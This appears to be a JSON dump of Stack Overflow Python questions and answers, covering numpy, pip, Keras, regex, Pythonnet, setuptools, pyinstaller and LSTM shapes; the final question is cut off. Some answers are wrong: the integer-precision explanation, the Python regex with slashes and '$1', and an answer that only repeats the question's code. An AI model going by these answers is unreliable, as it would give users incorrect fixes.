[{"Q_Id":75354472,"CreationDate":"2023-02-05 18:15:55","Q_Score":2,"ViewCount":82,"Question":"I created a Pixel class for image processing (and learn how to build a class). A full image is then a 2D numpy.array of Pixel but when I added a __getattr__ method , it stopped to work, because numpy wants an __array_struct__ attribute.\nI tried to add this in __getattr__:\nif name == '__array_struct__':\n return object.__array_struct__\n\nNow it works but I get\n'''DeprecationWarning: An exception was ignored while fetching the attribute __array__ from an object of type 'Pixel'. With the exception of AttributeError NumPy will always raise this exception in the future. Raise this deprecation warning to see the original exception. (Warning added NumPy 1.21)\nI = np.array([Pixel()],dtype = Pixel)'''\n\na part of the class:\nclass Pixel:\n def __init__(self,*args):\n\n #things to dertermine RGB\n self.R,self.G,self.B = RGB\n \n #R,G,B are float between 0 and 255\n ...\n def __getattr__(self,name):\n \n if name == '__array_struct__':\n return object.__array_struct__\n if name[0] in 'iI':\n inted = True\n name = name[1:]\n else:\n inted = False\n \n if len(name)==1:\n n = name[0]\n\n if n in 'rgba':\n value = min(1,self.__getattribute__(n.upper())\/255)\n \n elif n in 'RGBA':\n value = min(255,self.__getattribute__(n))\n assert 0<=value\n else:\n h,s,v = rgb_hsv(self.rgb)\n if n in 'h':\n value = h\n elif n == 's':\n value = s\n elif n == 'v':\n value = v\n elif n == 'S':\n value = s*100\n elif n == 'V':\n value = v*100\n elif n == 'H':\n value = int(h)\n if inted:\n return int(value)\n else:\n return value\n else:\n value = []\n for n in name:\n try:\n v = self.__getattribute__(n)\n except AttributeError:\n v = self.__getattr__(n)\n if inted:\n value.append(int(v))\n else:\n value.append(v)\n return value","Title":"How do I store objects I created in np.array if a __getattr__ exists?","Tags":"python,numpy-ndarray","AnswerCount":2,"A_Id":75354910,"Answer":"Your class should either implement __array__ or raise an AttributeError when numpy tries to get it. The warning message says you raised some other error and that numpy will not accept that in the future. I haven't figured out your code well enough to know, but it could be that calling self.__getattr__(n) inside of __getattr__ hits a maximum recursion error.\nobject.__array_struct__ doesn't exist and so just by luck its AttributeError exception is what numpy was looking for. A better strategy is to raise AttributeError for anything that doesn't meet the selection criteria for your automatically generated attributes. Then you can take out the special case for __array_struct__ that doesn't work properly anyway.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75354617,"CreationDate":"2023-02-05 18:37:23","Q_Score":3,"ViewCount":1365,"Question":"When I do pip install dotenv it says this -\n`Collecting dotenv\nUsing cached dotenv-0.0.5.tar.gz (2.4 kB)\nPreparing metadata (setup.py) ... error\nerror: subprocess-exited-with-error\n\u00d7 python setup.py egg_info did not run successfully.\n\u2502 exit code: 1\n\u2570\u2500> [72 lines of output]\nC:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\installer.py:27: SetuptoolsDeprecationWarning: setuptools.installer is deprecated. Requirements should be satisfied by\na PEP 517 installer.\nwarnings.warn(\nerror: subprocess-exited-with-error\n python setup.py egg_info did not run successfully.\n exit code: 1\n \n [17 lines of output]\n Traceback (most recent call last):\n File \"\", line 2, in \n File \"\", line 14, in \n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\__init__.py\", line 2, in \n from setuptools.extension import Extension, Library\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\extension.py\", line 5, in \n from setuptools.dist import _get_unpatched\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\dist.py\", line 7, in \n from setuptools.command.install import install\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\command\\__init__.py\", line 8, in \n from setuptools.command import install_scripts\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\setuptools\\command\\install_scripts.py\", line 3, in \n from pkg_resources import Distribution, PathMetadata, ensure_directory\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-wheel-xv3lcsr9\\distribute_009ecda977a04fb699d5559aac28b737\\pkg_resources.py\", line 1518, in \n register_loader_type(importlib_bootstrap.SourceFileLoader, DefaultProvider)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n AttributeError: module 'importlib._bootstrap' has no attribute 'SourceFileLoader'\n [end of output]\n \n note: This error originates from a subprocess, and is likely not a problem with pip.\n error: metadata-generation-failed\n \n Encountered error while generating package metadata.\n \n See above for output.\n \n note: This is an issue with the package mentioned above, not pip.\n hint: See above for details.\n Traceback (most recent call last):\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\installer.py\", line 82, in fetch_build_egg\n subprocess.check_call(cmd)\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\subprocess.py\", line 413, in check_call\n raise CalledProcessError(retcode, cmd)\n subprocess.CalledProcessError: Command '['C:\\\\Users\\\\Anju Tiwari\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python311\\\\python.exe', '-m', 'pip', '--disable-pip-version-check', 'wheel', '--no-deps', '-w', 'C:\\\\Users\\\\ANJUTI~1\\\\AppData\\\\Local\\\\Temp\\\\tmpcq62ekpo', '--quiet', 'distribute']' returned non-zero exit status 1.\n \n The above exception was the direct cause of the following exception:\n \n Traceback (most recent call last):\n File \"\", line 2, in \n File \"\", line 34, in \n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Temp\\pip-install-j7w9rs9u\\dotenv_0f4daa500bef4242bb24b3d9366608eb\\setup.py\", line 13, in \n setup(name='dotenv',\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\__init__.py\", line 86, in setup\n _install_setup_requires(attrs)\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\__init__.py\", line 80, in _install_setup_requires\n dist.fetch_build_eggs(dist.setup_requires)\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\dist.py\", line 875, in fetch_build_eggs\n resolved_dists = pkg_resources.working_set.resolve(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pkg_resources\\__init__.py\", line 789, in resolve\n dist = best[req.key] = env.best_match(\n ^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pkg_resources\\__init__.py\", line 1075, in best_match\n return self.obtain(req, installer)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\pkg_resources\\__init__.py\", line 1087, in obtain\n return installer(requirement)\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\dist.py\", line 945, in fetch_build_egg\n return fetch_build_egg(self, req)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"C:\\Users\\Anju Tiwari\\AppData\\Local\\Programs\\Python\\Python311\\Lib\\site-packages\\setuptools\\installer.py\", line 84, in fetch_build_egg\n raise DistutilsError(str(e)) from e\n distutils.errors.DistutilsError: Command '['C:\\\\Users\\\\Anju Tiwari\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python311\\\\python.exe', '-m', 'pip', '--disable-pip-version-check', 'wheel', '--no-deps', '-w', 'C:\\\\Users\\\\ANJUTI~1\\\\AppData\\\\Local\\\\Temp\\\\tmpcq62ekpo', '--quiet', 'distribute']' returned non-zero exit status 1.\n [end of output]\n\nnote: This error originates from a subprocess, and is likely not a problem with pip.\nerror: metadata-generation-failed\n\u00d7 Encountered error while generating package metadata.\n\u2570\u2500> See above for output.\nnote: This is an issue with the package mentioned above, not pip.\nhint: See above for details.`\nI tried doing pip install dotenv but then that error come shown above.\nI also tried doing pip install -U dotenv but it didn't work and the same error came. Can someone please help me fix this?","Title":"Pip install dotenv, Error 1 Windows 10 Pro","Tags":"python,error-handling,pip,download,dotenv","AnswerCount":1,"A_Id":75354709,"Answer":"pip install python-dotenv worked for me.","Users Score":7,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75355949,"CreationDate":"2023-02-05 22:31:29","Q_Score":1,"ViewCount":47,"Question":"def mean(x):\n return(sum(x)\/len(x))\n\ndef variance(x):\n x_mean = mean(x)\n return sum((x-x_mean)**2)\/(len(x)-1)\n\ndef standard_deviation(x):\n return math.sqrt(variance(x))\n\nThe functions above build on each other. They depend on the previous function. What is a good way to implement this in Python? Should I use a class which has these functions? Are there other options?","Title":"Functions depending on other functions in Python","Tags":"python","AnswerCount":1,"A_Id":75356009,"Answer":"Because they are widely applicable, keep them as they are\nMany parts of a program may need to calculate these statistics, and it will save wordiness to not have to get them out of a class. Moreover, the functions actually don't need any class-stored data: they would simply be static methods of a class. (Which in the old days, we would have simply called \"functions\"!)\nIf they needed to store internal information to work correctly, that is a good reason to put them into a class\nThe advantage in that case is that it is more obvious to the programmer what information is being shared. Moreover, you might want to create two or more instances that had different sets of shared data. That is not the case here.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75356060,"CreationDate":"2023-02-05 22:54:14","Q_Score":1,"ViewCount":304,"Question":"I need a product's unit of stock(quantity). Is it possible with SP API, if possible how can I get it?\nNote: I can get it with SKU like the following code but the product is not listed by my sellers.\nfrom sp_api.api import Inventories\nquantity = Inventories(credentials=credentials, marketplace=Marketplaces.FR).get_inventory_summary_marketplace(**{\n \"details\": False,\n \"marketplaceIds\": [\"A13V1IB3VIYZZH\"],\n \"sellerSkus\": [\"MY_SKU_1\" , \"MY_SKU_2\"]\n})\nprint(quantity)","Title":"How can I get quantity with SP API Python","Tags":"python,amazon-selling-partner-api","AnswerCount":1,"A_Id":75561704,"Answer":"from sp_api.api import Inventories\nquantity = Inventories(credentials=credentials, marketplace=Marketplaces.FR).get_inventory_summary_marketplace(**{\n\"details\": False,\n\"marketplaceIds\": [\"A13V1IB3VIYZZH\"],\n\"sellerSkus\": [\"MY_SKU_1\" , \"MY_SKU_2\"]\n})\nprint(quantity)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75356826,"CreationDate":"2023-02-06 02:20:41","Q_Score":1,"ViewCount":3566,"Question":"I'm training a VAE with TensorFlow Keras backend and I'm using Adam as the optimizer. the code I used is attached below.\n def compile(self, learning_rate=0.0001):\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.model.compile(optimizer=optimizer,\n loss=self._calculate_combined_loss,\n metrics=[_calculate_reconstruction_loss,\n calculate_kl_loss(self)])\n\nThe TensorFlow version I'm using is 2.11.0. The error I'm getting is\nAttributeError: 'Adam' object has no attribute 'get_updates'\n\nI'm suspecting the issues arise because of the version mismatch. Can someone please help me to sort out the issue? Thanks in advance.","Title":"AttributeError: 'Adam' object has no attribute 'get_updates'","Tags":"python,tensorflow","AnswerCount":3,"A_Id":76288587,"Answer":"Of late, I had to use the tensorflow2.5 and I replaced all \"import keras\" by \"import tensorflow.keras\".\nNow I use tensorflow2.12 and I met this error and when I returned those replacements; this error was removed.\nthank you!","Users Score":1,"is_accepted":false,"Score":0.0665680765,"Available Count":2},{"Q_Id":75356826,"CreationDate":"2023-02-06 02:20:41","Q_Score":1,"ViewCount":3566,"Question":"I'm training a VAE with TensorFlow Keras backend and I'm using Adam as the optimizer. the code I used is attached below.\n def compile(self, learning_rate=0.0001):\n optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n self.model.compile(optimizer=optimizer,\n loss=self._calculate_combined_loss,\n metrics=[_calculate_reconstruction_loss,\n calculate_kl_loss(self)])\n\nThe TensorFlow version I'm using is 2.11.0. The error I'm getting is\nAttributeError: 'Adam' object has no attribute 'get_updates'\n\nI'm suspecting the issues arise because of the version mismatch. Can someone please help me to sort out the issue? Thanks in advance.","Title":"AttributeError: 'Adam' object has no attribute 'get_updates'","Tags":"python,tensorflow","AnswerCount":3,"A_Id":76295165,"Answer":"Two ways worked for me,\n\nBy using tf.keras.optimizers.legacy.SGD - instead of tf.keras.optimizers.SGD\n\nImporting statement is changed from\nimport tensorflow.keras as keras to 'import keras'","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75356848,"CreationDate":"2023-02-06 02:27:11","Q_Score":2,"ViewCount":65,"Question":"I have a column that has name variations that I'd like to clean up. I'm having trouble with the regex expression to remove everything after the first word following a comma.\nd = {'names':['smith,john s','smith, john', 'brown, bob s', 'brown, bob']}\nx = pd.DataFrame(d)\n\nTried:\nx['names'] = [re.sub(r'\/.\\s+[^\\s,]+\/','', str(x)) for x in x['names']]\n\nDesired Output:\n['smith,john','smith, john', 'brown, bob', 'brown, bob']\n\nNot sure why my regex isn't working, but any help would be appreciated.","Title":"Regex - removing everything after first word following a comma","Tags":"python,regex","AnswerCount":2,"A_Id":75356969,"Answer":"Try re.sub(r'\/(,\\s*\\w+).*$\/','$1', str(x))...\nPut the triggered pattern into capture group 1 and then restore it in what gets replaced.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75357819,"CreationDate":"2023-02-06 06:02:38","Q_Score":1,"ViewCount":76,"Question":"I have training data with 2 dimension. (200 results of 4 features)\nI proved 100 different applications with 10 repetition resulting 1000 csv files.\nI want to stack each csv results for machine learning.\nBut I don't know how.\neach of my csv files look like below.\ntest1.csv to numpy array data\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]]\n\nI tried below python code.\npath = os.getcwd()\ncsv_files = glob.glob(os.path.join(path, \"*.csv\"))\ncnt=0\nfor f in csv_files:\n cnt +=1\n seperator = '_'\n app = os.path.basename(f).split(seperator, 1)[0]\n\n if cnt==1:\n a = np.array(preprocess(f))\n b = np.array(app)\n else:\n a = np.vstack((a, np.array(preprocess(f))))\n b = np.append(b,app)\nprint(a)\nprint(b)\n\npreprocess function returns df.to_numpy results for each csv files.\nMy expectation was like below. a(1000, 200, 4)\n[[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]],\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]],\n...\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]]]\n\nHowever, I'm getting this. a(200000, 4)\n[[0 'crc32_pclmul' 445 0]\n [0 'crc32_pclmul' 270 4096]\n [0 'crc32_pclmul' 234 8192]\n ...\n [249 'intel_pmt' 272 4096]\n [249 'intel_pmt' 224 8192]\n [249 'intel_pmt' 268 12288]]\n\nI want to access each csv results using a[0] to a[1000] each sub-array looks like (200,4)\nHow can I solve the problem? I'm quite lost","Title":"make 3d numpy array using for loop in python","Tags":"python,arrays,numpy,3d,2d","AnswerCount":3,"A_Id":75357911,"Answer":"Make a new list (outside of the loop) and append each item to that new list after reading.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75360485,"CreationDate":"2023-02-06 11:03:48","Q_Score":1,"ViewCount":104,"Question":"I am new to docker and using apptainer for that.\nthe def file is: firstApp.def:\n`Bootstrap: docker\nFrom: ubuntu:22.04\n\n%environment\n export LC_ALL=C\n`\n\nthen I built it as follows and I want it to be writable (I hope I am not so naive), so I can install some packages later:\n`apptainer build --sandbox --fakeroot firstApp.sif firstApp.def\n`\n\nnow I do not know how to install Python3 (preferably, 3.8 or later).\nI tried to add the following command lines to the def file:\n`%post\n apt-get -y install update\n apt-get -y install python3.8 `\n\nit raises these errors as well even without \"apt-get -y install python3.8\":\nReading package lists... Done\nBuilding dependency tree... Done\nReading state information... Done\nE: Unable to locate package update\nFATAL: While performing build: while running engine: exit status 100","Title":"How to install Python or R in an apptainer?","Tags":"python,docker,apptainer","AnswerCount":1,"A_Id":75740197,"Answer":"This work for me\n%post\napt-get update && apt-get install -y netcat python3.8","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75360628,"CreationDate":"2023-02-06 11:19:44","Q_Score":1,"ViewCount":45,"Question":"I defined a function which returns a third order polynomial function for either a value, a list or a np.array:\ndef two_d_third_order(x, a, b, c, d):\n return a + np.multiply(b, x) + np.multiply(c, np.multiply(x, x)) + np.multiply(d, np.multiply(x, np.multiply(x, x)))\n\nThe issue I noticed is, however, when I use \"two_d_third_order\" on the following two inputs:\n1500\n1500.0\nWith (a, b, c, d) = (1.20740028e+00, -2.93682465e-03, 2.29938078e-06, -5.09134552e-10), I get two different results:\n2.4441\n0.2574\n, respectively. I don't know how this is possible, and any help would be appreciated.\nI tried several inputs, and somehow the inclusion of a floating point on certain values (despite representing the same numerical value) changes the end result.","Title":"Python code yielding different result for same numerical value, depending on inclusion of precision point","Tags":"python-3.x,numpy,scipy","AnswerCount":2,"A_Id":75362712,"Answer":"Python uses implicit data type conversions. When you use only integers (like 1500), there is a loss of precision in all subsequent operations. Whereas when you pass it a float or double (like 1500.0), subsequent operations are performed with the associated datatype, i.e in this case with higher precision.\nThis is not a \"bug\" so to speak, but generally how Python operates without the explicit declaration of data types. Languages like C and C++ require explicit data type declarations and explicit data type casting to ensure operations are performed in the prescribed precision formats. Can be a boon or a bane depending on usage.","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75362126,"CreationDate":"2023-02-06 13:46:28","Q_Score":2,"ViewCount":1574,"Question":"I try to use an assembly for .NET framework 4.8 via Pythonnet. I am using version 3.0.1 with Python 3.10. The documentation of Pythonnet is stating:\n\nYou must set Runtime.PythonDLL property or PYTHONNET_PYDLL environment variable starting with version 3.0, otherwise you will receive BadPythonDllException (internal, derived from MissingMethodException) upon calling Initialize. Typical values are python38.dll (Windows), libpython3.8.dylib (Mac), libpython3.8.so (most other Unix-like operating systems).\n\nHowever, the documentation unfortunately is not stating how the property is set and I do not understand how to do this.\nWhen I try:\nimport clr\nfrom pythonnet import load\n\nload('netfx')\n\nclr.AddReference(r'path\\to\\my.dll')\n\nunsurprisingly the following error is coming up\nFailed to initialize pythonnet: System.InvalidOperationException: This property must be set before runtime is initialized\n bei Python.Runtime.Runtime.set_PythonDLL(String value)\n bei Python.Runtime.Loader.Initialize(IntPtr data, Int32 size)\n bei Python.Runtime.Runtime.set_PythonDLL(String value)\n bei Python.Runtime.Loader.Initialize(IntPtr data, Int32 size)\n[...]\nin load\n raise RuntimeError(\"Failed to initialize Python.Runtime.dll\")\nRuntimeError: Failed to initialize Python.Runtime.dll\n\nThe question now is, where and how the Runtime.PythonDLL property or PYTHONNET_PYDLL environment variable is set\nThanks,\nJens","Title":"Trouble shooting using Pythonnet and setting Runtime.PythonDLL property","Tags":"python,.net,clr,python.net","AnswerCount":2,"A_Id":75368080,"Answer":"I believe this is because import clr internally calls pythonnet.load, and in the version of pythonnet you are using this situation does not print any warning.\nE.g. the right way is to call load before you call import clr for the first time.","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75362342,"CreationDate":"2023-02-06 14:04:40","Q_Score":1,"ViewCount":27,"Question":"I have a virtual environment where I am developing a Python package. The folder tree is the following:\nworking-folder\n|-setup.py\n|-src\n |-my_package\n |-__init__.py\n |-my_subpackage\n |-__init__.py\n |-main.py\n\nmain.py contains a function my_main that ideally, I would want to run as a bash command.\nI am using setuptools and the setup function contains the following line of code\nsetup(\n...\n entry_point={\n \"console_scripts\": [\n \"my-command = src.my_package.my_subpackage.main:my_main\",\n ]\n },\n...\n)\n\n\nWhen I run pip install . the package gets correctly installed in the virtual environment. However, when running my-command on the shell, the command does not exist.\nAm I missing some configuration to correctly generate the entry point?","Title":"Python entry_point in virtual environment not working","Tags":"python,package,virtualenv,setuptools,entry-point","AnswerCount":1,"A_Id":75386087,"Answer":"I simply mistyped the argument entry_point, which actually is entry_points. Unfortunately, I was not getting any output errors.","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75362809,"CreationDate":"2023-02-06 14:45:06","Q_Score":2,"ViewCount":274,"Question":"I have a figure with different plots on several axes. Some of those axes do not play well with some of the navigation toolbar actions. In particular, the shortcuts to go back to the home view and the ones to go to the previous and next views.\nIs there a way to disable those shortcuts only for those axes? For example, in one of the two in the figure from the example below.\nimport matplotlib.pyplot as plt\n\n# Example data for two plots\nx1 = [1, 2, 3, 4]\ny1 = [10, 20, 25, 30]\nx2 = [2, 3, 4, 5]\ny2 = [5, 15, 20, 25]\n\n# Create figure and axes objects\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 5))\n\n# Plot data on the first axis\nax1.plot(x1, y1)\nax1.set_title(\"First Plot\")\n\n# Plot data on the second axis\nax2.plot(x2, y2)\nax2.set_title(\"Second Plot\")\n\n# Show plot\nplt.show()\n\n\nEdit 1:\nThe following method will successfully disable the pan and zoom tools from the GUI toolbox in the target axis.\nax2.set_navigate(False)\n\nHowever, the home, forward, and back buttons remain active. Is there a trick to disable also those buttons in the target axis?","Title":"How to disable the Matplotlib navigation toolbar in a particular axis?","Tags":"python,matplotlib,user-interface,widget,interactive","AnswerCount":3,"A_Id":75447405,"Answer":"You can try to use ax2.get_xaxis().set_visible(False)","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75363011,"CreationDate":"2023-02-06 15:03:27","Q_Score":1,"ViewCount":362,"Question":"I am trying to automate the process of liking pages on Facebook. I've got a list of each page's link and I want to open and like them one by one.\nI think the Like button doesn't have any id or name, but it is in a span class.\nLike<\/span>\n\nI used this code to find and click on the \"Like\" button.\ndef likePages(links, driver):\n for link in links:\n driver.get(link)\n time.sleep(3)\n driver.find_element(By.LINK_TEXT, 'Like').click()\n\nAnd I get the following error when I run the function:\nselenium.common.exceptions.NoSuchElementException: Message: no such element: Unable to locate element","Title":"How to find and click the \"Like\" button on Facebook page using Selenium","Tags":"python,selenium,selenium-webdriver,xpath,nosuchelementexception","AnswerCount":2,"A_Id":75363222,"Answer":"You cannot use Link_Text locator as Like is not a hyperlink. Use XPath instead, see below:\nXPath : \/\/span[contains(text(),\"Like\")]\ndriver.find_element(By.XPATH, '\/\/span[contains(text(),\"Like\")]').click()","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75367685,"CreationDate":"2023-02-06 23:46:22","Q_Score":1,"ViewCount":266,"Question":"i have a package and in it i use pyproject.toml\nand for proper typing i need stubs generated, although\nits kinda annoying to generate them manually every time,\nso, is there a way to do it automatically using it ?\ni just want it to run stubgen and thats it, just so\nmypy sees the stubs and its annoying seeing linters\nthrow warnings and you keep having to # type: ignore\nheres what i have as of now, i rarely do this so its probably\nnot that good :\n[build-system]\nrequires = [\"setuptools\", \"setuptools-scm\"]\nbuild-backend = \"setuptools.build_meta\"\n\n[project]\nname = \"<...>\"\nauthors = [\n {name = \"<...>\", email = \"<...>\"},\n]\ndescription = \"<...>\"\nreadme = \"README\"\nrequires-python = \">=3.10\"\nkeywords = [\"<...>\"]\nlicense = {text = \"GNU General Public License v3 or later (GPLv3+)\"}\nclassifiers = [\n \"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)\",\n \"Programming Language :: Python :: 3\",\n]\ndependencies = [\n \"<...>\",\n]\ndynamic = [\"version\"]\n\n\n[tool.setuptools]\ninclude-package-data = true\n\n[tool.setuptools.package-data]\n<...> = [\"*.pyi\"]\n\n[tool.pyright]\npythonVersion = \"3.10\"\nexclude = [\n \"venv\",\n \"**\/node_modules\",\n \"**\/__pycache__\",\n \".git\"\n]\ninclude = [\"src\", \"scripts\"]\nvenv = \"venv\"\nstubPath = \"src\/stubs\"\ntypeCheckingMode = \"strict\"\nuseLibraryCodeForTypes = true\nreportMissingTypeStubs = true\n\n[tool.mypy]\nexclude = [\n \"^venv\/.*\",\n \"^node_modules\/.*\",\n \"^__pycache__\/.*\",\n]\n\nthanks for the answers in advance","Title":"how to automatically generate mypy stubs using pyproject.toml","Tags":"python,python-3.x,mypy,pyproject.toml","AnswerCount":1,"A_Id":75371297,"Answer":"just make a shellscript and add it to pyproject.toml as a script\n:+1:","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75368407,"CreationDate":"2023-02-07 02:27:36","Q_Score":1,"ViewCount":43,"Question":"I made an .exe file using pyinstaller, but when I run the file it opens a PowerShell window as well. I was wondering if there is anyway I can get it to not open so I just have the python program open.\nI haven't really tried anything as I don't really know what I'm doing.","Title":".exe file opening Powershell Window","Tags":"python,powershell,pyinstaller,exe","AnswerCount":2,"A_Id":75368754,"Answer":"if you run it from terminal, you can use this command:\nstart \/min \"\" \"path\\file_name.exe\"","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":2},{"Q_Id":75368407,"CreationDate":"2023-02-07 02:27:36","Q_Score":1,"ViewCount":43,"Question":"I made an .exe file using pyinstaller, but when I run the file it opens a PowerShell window as well. I was wondering if there is anyway I can get it to not open so I just have the python program open.\nI haven't really tried anything as I don't really know what I'm doing.","Title":".exe file opening Powershell Window","Tags":"python,powershell,pyinstaller,exe","AnswerCount":2,"A_Id":75368529,"Answer":"When running pyinstaller be sure to use the --windowed argument. For example:\n\npyinstaller \u2013-onefile myFile.py \u2013-windowed","Users Score":0,"is_accepted":true,"Score":1.2,"Available Count":2},{"Q_Id":75368490,"CreationDate":"2023-02-07 02:45:45","Q_Score":1,"ViewCount":112,"Question":"this is my data X_train prepared for LSTM of shape (7000, 2, 200)\n[[[0.500858 0. 0.5074856 ... 1. 0.4911533 0. ]\n [0.4897923 0. 0.48860878 ... 0. 0.49446714 1. ]]\n\n [[0.52411383 0. 0.52482396 ... 0. 0.48860878 1. ]\n [0.4899698 0. 0.48819458 ... 1. 0.4968341 1. ]]\n\n ...\n\n [[0.6124623 1. 0.6118705 ... 1. 0.6328777 0. ]\n [0.6320492 0. 0.63512635 ... 1. 0.6960175 0. ]]\n\n [[0.6118113 1. 0.6126989 ... 0. 0.63512635 1. ]\n [0.63530385 1. 0.63595474 ... 1. 0.69808865 0. ]]]\n\nI create my sequential model\nmodel = Sequential()\nmodel.add(LSTM(units = 50, activation = 'relu', input_shape = (X_train.shape[1], 200)))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(1, activation = 'linear'))\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adam')\n\nThen I fit my model:\nhistory = model.fit(\n X_train, \n Y_train, \n epochs = 20, \n batch_size = 200, \n validation_data = (X_test, Y_test), \n verbose = 1, \n shuffle = False,\n)\nmodel.summary()\n\nAnd at the end I can see something like this:\n Layer (type) Output Shape Param # \n=================================================================\n lstm_16 (LSTM) (None, 2, 50) 50200 \n \n dropout_10 (Dropout) (None, 2, 50) 0 \n \n dense_10 (Dense) (None, 2, 1) 51 \n\nWhy does it say that output shape have a None value as a first element? Is it a problem? Or it should be like this? What does it change and how can I change it?\nI will appreciate any help, thanks!","Title":"Keras LSTM None value output shape","Tags":"python,tensorflow,keras,lstm","AnswerCount":1,"A_Id":75368566,"Answer":"The first value in TensorFlow is always reserved for the batch-size. Your model doesn't know in advance what is your batch-size so it makes it None. If we go into more details let's suppose your dataset is 1000 samples and your batch-size is 32. So, 1000\/32 will become 31.25, if we just take the floor value which is 31. So, there would be 31 batches in a total of size 32. But if you look here the total sample size of your dataset is 1000 but you have 31 batches of size 32, which is 32 * 31 = 992, where 1000 - 992 = 8, it means there would be one more batch of size 8. But the model doesn't know in advance so, what does it do? it reserves a space in the memory where it doesn't define a specific shape for it, in other words, the memory is dynamic for the batch-size. Therefore, you are seeing it None there. So, the model doesn't know in advance what would be the shape of my batch-size so it makes it None so it should know it later when it computes the first epoch meaning computes all of the batches.\nThe None value can't be changed because it is Dynamic in Tensorflow, the model knows it and fix it when your model completes its first epoch. So, always set the shapes which are after it like in your case it is (2, 200). The 7000 is your model's total number of samples so the model doesn't know in advance what would be your batch-size and the other big issue is most of the time your batch-size is not evenly divisible by your total number of samples in dataset therefore, it is necessary for the model to make it None to know it later when it computes all the batches in the very first epoch.","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75368928,"CreationDate":"2023-02-07 04:20:39","Q_Score":1,"ViewCount":123,"Question":"I have docker file like below:\nFROM continuumio\/miniconda3\n\nRUN conda update -n base -c defaults conda\nRUN conda create -c conda-forge -n pymc3_env pymc3 numpy theano-pymc mkl mkl-service\n\nCOPY .\/src \/app\n\nWORKDIR \/app\n\nCMD [\"conda\", \"run\", \"-n\", \"pymc3_env\", \"python\", \"ma.py\"]\n\nI get the following error:\n------ \n > [3\/5] 